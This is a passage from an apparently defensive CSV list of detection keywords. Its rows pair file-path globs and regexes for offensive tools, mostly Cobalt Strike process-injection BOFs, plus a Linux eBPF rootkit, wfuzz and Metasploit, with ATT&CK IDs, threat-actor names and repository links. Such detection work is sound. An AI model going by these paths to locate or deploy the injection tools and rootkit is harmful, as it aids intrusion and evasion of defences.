Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8070" 
"*/Injection/conhost/*",".{0,1000}\/Injection\/conhost\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8071" "*/Injection/createremotethread/*",".{0,1000}\/Injection\/createremotethread\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8072" "*/Injection/ctray/*",".{0,1000}\/Injection\/ctray\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8073" "*/Injection/dde/*",".{0,1000}\/Injection\/dde\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - 
AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8074" "*/Injection/Injection.cna*",".{0,1000}\/Injection\/Injection\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8075" "*/Injection/kernelcallbacktable*",".{0,1000}\/Injection\/kernelcallbacktable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8076" "*/Injection/ntcreatethread*",".{0,1000}\/Injection\/ntcreatethread.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8077" "*/Injection/ntcreatethread/*",".{0,1000}\/Injection\/ntcreatethread\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike 
Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8078" "*/Injection/ntqueueapcthread*",".{0,1000}\/Injection\/ntqueueapcthread.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8079" "*/Injection/setthreadcontext*",".{0,1000}\/Injection\/setthreadcontext.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8080" "*/Injection/svcctrl/*",".{0,1000}\/Injection\/svcctrl\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common 
Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8081" "*/Injection/tooltip/*",".{0,1000}\/Injection\/tooltip\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 
- Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8082" "*/Injection/uxsubclassinfo*",".{0,1000}\/Injection\/uxsubclassinfo.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8083" "*/injection_lib.so*",".{0,1000}\/injection_lib\.so.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","8084" "*/Injections/SQL.txt*",".{0,1000}\/Injections\/SQL\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","8085" "*/injectsu.exp*",".{0,1000}\/injectsu\.exp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8086" "*/injectsu.lib*",".{0,1000}\/injectsu\.lib.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8087" "*/injectsu.pdb*",".{0,1000}\/injectsu\.pdb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8088" "*/injectsu/*",".{0,1000}\/injectsu\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and 